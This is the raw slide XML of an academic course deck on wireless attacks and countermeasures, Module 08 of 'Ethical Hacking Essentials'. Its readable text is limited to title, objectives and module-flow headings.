                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ethical Hacking Essentials (EHE)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Master of Science in Cybersecurity </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272930" y="3173560"/>
            <a:ext cx="6952234" cy="3615267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z="4800" b="1" i="1" dirty="0"/>
              <a:t>Dr. Kamal Alieyan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Everyone Smart University  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faculty of IT – 2022/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257006" y="2941638"/>
            <a:ext cx="382108" cy="182563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lIns="45720" tIns="22860" rIns="45720" bIns="22860" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="r" defTabSz="228600" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="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28600" algn="l" defTabSz="2286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57200" algn="l" defTabSz="2286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685800" algn="l" defTabSz="2286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914400" algn="l" defTabSz="2286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43000" algn="l" defTabSz="2286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371600" algn="l" defTabSz="2286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600200" algn="l" defTabSz="2286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828800" algn="l" defTabSz="2286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914400">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BC7E4EF3-2510-4CA4-AC11-B867A8637131}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A5300F"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29698" name="Picture 2" descr="Network security Computer network Computer security Software-defined  networking, cyber security, electric Blue, technology png | PNGEg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633108" y="489453"/>
            <a:ext cx="2795614" cy="27956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Picture 4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484632" y="4049559"/>
            <a:ext cx="3092568" cy="1863271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99057241"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"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Placeholder 4" descr="A picture containing person&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D008B14-418C-41C7-901B-70CECD64326C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13" b="7813"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6544100"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728265" y="4287595"/>
            <a:ext cx="9463735" cy="1464276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/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4263067" y="5048537"/>
            <a:ext cx="7649338" cy="553998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Wireless Attacks and Countermeasures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829800" y="4461691"/>
            <a:ext cx="2082604" cy="5078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700" b="1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alibri" panose="020F0502020204030204"/>
                <a:ea typeface="Open Sans Light" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 08</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Round Same Side Corner Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="189133" y="-1"/>
            <a:ext cx="2049099" cy="1542193"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6047"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FA957A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5522" y="126696"/>
            <a:ext cx="1576321" cy="1288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24588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Rectangle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0628AFC8-0A5B-4836-9FAA-1737CF4C6B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705475" y="1264681"/>
            <a:ext cx="5870604" cy="3847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Overview of Wireless Terminology  </a:t>
            </a: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70BEB5A8-65F8-46F6-A4AC-709540B62EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="1242284"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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7225A58-7626-4ADF-831A-610CEE3CCC18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="1241598"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1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E75B7B13-E4A0-46F4-8E69-1D2CE690F6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705475" y="2035021"/>
            <a:ext cx="6050342" cy="3847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Overview of Wireless Encryption Algorithms</a:t>
            </a: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F67E1D6C-5D31-48A8-8951-72A585FEE9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="2012624"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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5097960-02D8-4F00-9614-E62D174D0C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="2011938"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2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CBD2CB01-0D01-458A-B1FD-91EA9677CF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705476" y="2805361"/>
            <a:ext cx="6181724" cy="3847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Understanding Wireless Network-Specific Attack Techniques</a:t>
            </a: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F566041E-51C8-43F7-983C-5003F13E874A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="2782964"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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D3246391-8DCC-4046-84AB-C54D7AF13DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="2782278"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a: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86DF7DEE-FF02-40A9-B825-EF50AAA70A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705474" y="3575701"/>
            <a:ext cx="5492073" cy="3847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Overview of Different Wireless Attack Tools</a:t>
            </a:r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E4532668-FD46-472C-B08E-726D165C588D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="3553304"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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3D6E4F7-5445-4605-9EF4-2CBCC1B59D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="3552618"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4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3B97AEC6-0063-485A-9D7F-273A7BDF90A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705474" y="4346041"/>
            <a:ext cx="5492073" cy="3847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Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN" sz="1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Bluetooth Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="19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0923B6F0-7CC4-4763-8EF7-C702A1F3584A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="4323644"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0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9CCE8F23-3D6A-4450-A441-2C433616B9E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="4322958"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5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AFA6DE9B-C92E-408A-A04D-33E34275CA4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705475" y="5116381"/>
            <a:ext cx="6050342" cy="3847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Overview of Various </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN" sz="1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Wireless Attack Countermeasures</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="19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D2A28EBB-C673-4233-AE3D-EFB61064A4E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="5093984"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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D1022A6-1B9E-412D-B2E1-A10BDB17D6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="5093298"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r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F4D65933-14F5-4067-8FCA-EEE25CE6322B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705474" y="5886721"/>
            <a:ext cx="5315127" cy="3847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Overview of Different </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN" sz="19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Wireless Security Tools</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="19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5FD5BF0B-9D29-45D6-BD7C-3EC96A742935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="5864324"/>
            <a:ext cx="429514" cy="429514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28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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457200"/>
            <a:endParaRPr lang="en-US" sz="2700" b="1" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18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6548CCF-7555-4ED9-835F-8B94408E1FA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140553" y="5863638"/>
            <a:ext cx="340158" cy="43088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defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>7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D17A8AC-D024-4845-A2A9-8747C7C9985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</p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7118172D-1DE2-45B7-9718-6678047D2665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900" r="26900"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-4060"/>
            <a:ext cx="4876800" cy="6568190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94E62C7-95AC-4C6C-B8D9-156F37BE521C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4998720" y="268052"/>
            <a:ext cx="4704432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217"/>
            <a:r>
              <a:rPr lang="en-US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Module Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3612123998"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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Rectangle 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F9220-FD9E-489E-AF7E-DBE5DD5CF61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1942730" y="1447801"/>
            <a:ext cx="3284590" cy="99433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>
            <a:scene3d>
              <a:camera prst="perspectiveAbove"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene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4523584" y="221787"/>
            <a:ext cx="3144836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rPr>
              <a:t>Module Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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74" name="Oval 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632813" y="3354600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="38100"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" name="Oval 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877160" y="4885888"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="3810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" name="Oval 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900848" y="2514600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381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7" name="Oval 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782072" y="4207543"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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B9016AFD-5B5A-4813-A53E-5D4C3615CEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578635" y="2476299"/>
            <a:ext cx="2897085" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Different Types of Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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B14C850-384D-43ED-A074-9D81FF2B7B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430979" y="4194087"/>
            <a:ext cx="2532421" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Bluetooth Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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4F181BEB-E04A-42A9-9AC7-2704A1A580BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="496386" y="3276600"/>
            <a:ext cx="3083372" cy="6697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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Network-Specific Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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178D3AB4-6CCD-4627-81A0-952F323A0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1942730" y="1637194"/>
            <a:ext cx="2418764" cy="61555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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Wireless Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRP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7CEA977D-F9E3-49EA-AA26-D48AC44B87B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414470" y="1669051"/>
            <a:ext cx="551839" cy="551839"/>
            <a:chOff x="4150833" y="1613610"/>
            <a:chExt cx="551839" cy="551839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Oval 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4150833" y="1613610"/>
              <a:ext cx="551839" cy="551839"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="38100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Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86753C4D-EE69-4971-84FE-58F31E5B7B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82955" y="1737961"/>
              <a:ext cx="285358" cy="296356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198438 w 58"/>
                <a:gd name="T1" fmla="*/ 162089 h 58"/>
                <a:gd name="T2" fmla="*/ 160803 w 58"/>
                <a:gd name="T3" fmla="*/ 200025 h 58"/>
                <a:gd name="T4" fmla="*/ 37635 w 58"/>
                <a:gd name="T5" fmla="*/ 200025 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 58"/>
                <a:gd name="T7" fmla="*/ 162089 h 58"/>
                <a:gd name="T8" fmla="*/ 0 w 58"/>
                <a:gd name="T9" fmla="*/ 34487 h 58"/>
                <a:gd name="T10" fmla="*/ 37635 w 58"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 160803 w 58"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 198438 w 58"/>
                <a:gd name="T15" fmla="*/ 34487 h 58"/>
                <a:gd name="T16" fmla="*/ 198438 w 58"/>
                <a:gd name="T17" fmla="*/ 162089 h 58"/>
                <a:gd name="T18" fmla="*/ 167646 w 58"/>
                <a:gd name="T19" fmla="*/ 72423 h 58"/>
                <a:gd name="T20" fmla="*/ 167646 w 58"/>
                <a:gd name="T21" fmla="*/ 58628 h 58"/>
                <a:gd name="T22" fmla="*/ 153961 w 58"/>
                <a:gd name="T23" fmla="*/ 44833 h 58"/>
                <a:gd name="T24" fmla="*/ 143696 w 58"/>
                <a:gd name="T25" fmla="*/ 44833 h 58"/>
                <a:gd name="T26" fmla="*/ 82112 w 58"/>
                <a:gd name="T27" fmla="*/ 106910 h 58"/>
                <a:gd name="T28" fmla="*/ 54742 w 58"/>
                <a:gd name="T29" fmla="*/ 79320 h 58"/>
                <a:gd name="T30" fmla="*/ 44477 w 58"/>
                <a:gd name="T31" fmla="*/ 79320 h 58"/>
